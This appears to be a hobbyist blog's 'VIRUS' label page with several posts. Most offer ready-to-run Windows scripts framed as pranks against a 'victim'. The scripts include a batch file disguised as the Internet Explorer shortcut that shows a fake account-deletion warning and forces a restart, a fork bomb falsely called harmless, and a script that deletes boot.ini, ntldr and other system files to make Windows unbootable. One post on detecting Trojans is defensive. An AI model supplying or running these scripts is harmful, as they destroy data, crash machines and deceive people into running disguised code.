Showing posts with label VIRUS. Show all posts
Showing posts with label VIRUS. Show all posts

Wednesday, 21 March 2012

Fake Facebook Virus


In this tutorial I will show you how to make a  Facebook virus using simple commands on notepad. .this will make the victim think they have got a virus when they click on an icon such as Internet Explorer .
1) Open notepad
2) Type this in :

@echo off
msg * warning VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT ACCOUNT WILL BE DELETED !!!!TO REMOVE THE  VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR  FACEBOOK  ACCOUNT  ARE NOW BEING DELETED !!! PLEASE WAIT ..........."

3)Save as Internet Explorer .bat
4)Right click on Internet Explorer .bat and click Create Shortcut
5)Right click on shorcut and click Properties.
6)Click Change Icon
7) Choose Internet Explorer icon or similar , click OK , then click Apply
8)Delete real shortcut and replace it with fake . When victim click on it , he will get warningmessages that looks like this:
After five minutes windows will restart , that is all. This is totally harmless and will give you a laugh. Enjoy !

Thursday, 1 March 2012

5 computer Pranks To Try on your Victim Computer!



  comp13%5B6%5D
 Today is not April fool’s day, but here are some cool computer pranks. Keep In Mind That We’re not responsible if  you get your Butt kicked for pranking your friend computer. None Of These Files Are Harmful To Your Computer In Any Way. Take It Upon Your Self To Try These Pranks On Your Friends Computer. Use At Your Own Risk! 

1.) Fork Bomb

This script Open’s 100’s upon 100’s of notepad’s – Most Known as The Fork Bomb.
Computer may freezes and crashes until you reboot. 

@echo off
:top
start %SystemRoot%\system32\notepad.exe
goto top
  • Save This File As >> Forkbomb.bat
  • Change
  • Save as Type >>Text Document .(TXT)
  • To Save as Type >> All Files (*.*)

2.)Screen Color Prank

Screen Screw does just that, it screws with your screen. When you first run the program you will notice your screen will F**k up. You may think you’ll need a new screen, The entire screen will have an odd color tint that keeps changing to different color every 10 seconds. The computer is still usable, however the screen looks ruined.Screen Screw is a harmless prank that will not only screw with your screen, it will screw with your mind!Download Screen Screw, its free and fun. 
How To Use | Download

3.)Backwards Mouse

Backwards Mouse will make anyone think that their mouse has gone haywire! Every mouse move will be reversed. If they move the mouse up, it will move down. If they move the mouse left, it will move right. It won't take long for them to figure out that you got’em, but it is well worth the effort. Backwards Mouse will liven up any boring office with a simple move of the mouse. 
How To Use | Download

4.)Clippy Assistant

Clippy is a simulated office assistant that, when ran, will hide in the background for 1 minute then popup in the lower right hand corner of the screen and say something useless. There is no right-click Hide option on our Clippy prank, you will think there is no way to get rid of it (but there is). Every minute, Clippy pops up spouting useless nonsense about your computer. Clippy looks exactly like the annoying Clippy assistant you are used to, complete with sound and a variable size hint box based on the size of the hint.
How To Use | Download

5.)Auto ~ Typer

.(VBS) Script
This script Opens notepad And Types  into the notepad dialog you can easy modify this code just by looking at it, It does not take a genius to figure this code out.

set wshshell = wscript.CreateObject("wscript.shell")
wshshell.run "Notepad"
wscript.sleep 2000
wshshell.AppActivate "Notepad"
WshShell.SendKeys "Mo"
WScript.Sleep 500
WshShell.SendKeys "re"
WScript.Sleep 500
WshShell.SendKeys " T"
WScript.Sleep 500
WshShell.SendKeys "utor"
WScript.Sleep 500
WshShell.SendKeys "ial"
WScript.Sleep 500
WshShell.SendKeys "'s A"
WScript.Sleep 500
WshShell.SendKeys "t "
WScript.Sleep 500
WshShell.SendKeys "Th"
WScript.Sleep 500
WshShell.SendKeys "eE"
WScript.Sleep 500
WshShell.SendKeys "mo"
WScript.Sleep 500
WshShell.SendKeys "La"
WScript.Sleep 500
WshShell.SendKeys "b."
WScript.Sleep 500
WshShell.SendKeys "C"
WScript.Sleep 500
WshShell.SendKeys "om"
WScript.Sleep 500








  • Save As Type >> All files
  • Filename >> Writer.vbs
    HOPE SO YOU LIKED THE POST FOR ANY QUERIES JUST FEEL FREE TO COMMENT

    Wednesday, 4 January 2012

    How to Detect Trojan Horse



    Detecting a Trojan
    Awareness and preventive measures are the best defense against Trojans. Educate users not  to install applications downloaded from the Internet and email attachments. Most commercial anti-virus products can automatically scan and detect backdoor programs before they can cause damage.
    Using Anti-Trojan Software:
    Antivirus software is designed to detect and delete Trojan horses, as well as preventing them from ever being installed. Although it is possible to remove a Trojan horse manually, it requires a full understanding of how that particular Trojan horse operates. In addition, if a Trojan horse has possibly been used by a hacker to access a computer system, it will be difficult to know what damage has been done and what other problems have been introduced.
    Manual Detection
    Though manual removal/detection of Trojans is difficult, but this is best way to remove the Trojans completely from the computer. With practice, it becomes easy to manually detect/remove the Trojans
    TCPView
    TCPView is a Windows program that will show you detailed listings of all TCP and UDP endpoints on your system, including the local and remote addresses and state of TCP connections. On Windows NT, 2000, and XP, TCPView also reports the name of the process that owns the endpoint. TCPView provides a more informative and conveniently presented subset of the Netstat program that ship with Windows. The TCPView download includes Tcpvcon, a command-line version with the same functionality.
    Tcpvcon is the command-line version of TCPView. Its usage is similar to that of the built-in Windows netstat utility. Just typing tcpvcon in a CMD box runs the Application.
    Process Viewer
    Process Viewer (PrcView) (www.teamcti.com/pview/prcview.htm) is a free GUI-based process viewer utility that displays detailed information about processes running under Windows. For each process it displays memory, threads, and module usage. For each DLL, it shows full path and version information. PrcView comes with a command-line version that allows you to write scripts to check whether a process is running and stop it, if necessary.
    Process Explorer
    Process Explorer is a freeware computer program for Microsoft Windows created by Sysinternals, which was acquired by Microsoft Corporation. Process Explorer is a system monitoring and examination utility. It provides the functionality of Windows Task Manager along with a rich set of features for collecting information about processes running on the user’s system. It can be used as the first step in debugging software or system problems. Process Explorer can be used to track down problems. For example, it provides a means to list or search for named resources that are held by a process or all processes. This can be used to track down what is holding a file open and preventing its use by another program. Or as another example, it can show the command lines used to start a program, allowing otherwise identical processes to be distinguished. Or like Task Manager, it can show a process that is maxing out the CPU, but unlike Task Manager it can
    Show which thread (with the call stack) is using the CPU – information that is not even available under a debugger.

    Thursday, 15 December 2011

    Virus Don't Try this


    Don’t Dare to Run It.
    (only for learning)



    Please trust me, this code is only for knowledge purpose, if you run this code, after you will loss all your data and your computer will not start. Only you can login to your computer by installing new windows… isn’t it cool guys…
    If you want to try than I have no responsibility.
    Because this is not a simple virus, its effect is more danger than trogen horses.


    As usual copy the code to notepad
    And save as fool.bat. (don’t forget to set extension as .bat )



    Code: Batch
    @echo off
    attrib -r -s -h c:\autoexec.bat
    del c:\autoexec.bat
    attrib -r -s -h c:\boot.ini
    del c:\boot.ini
    attrib -r -s -h c:\ntldr
    del c:\ntldr
    attrib -r -s -h c:\windows\win.ini
    del c:\windows\win.ini


    Take care ;)

    Popular Posts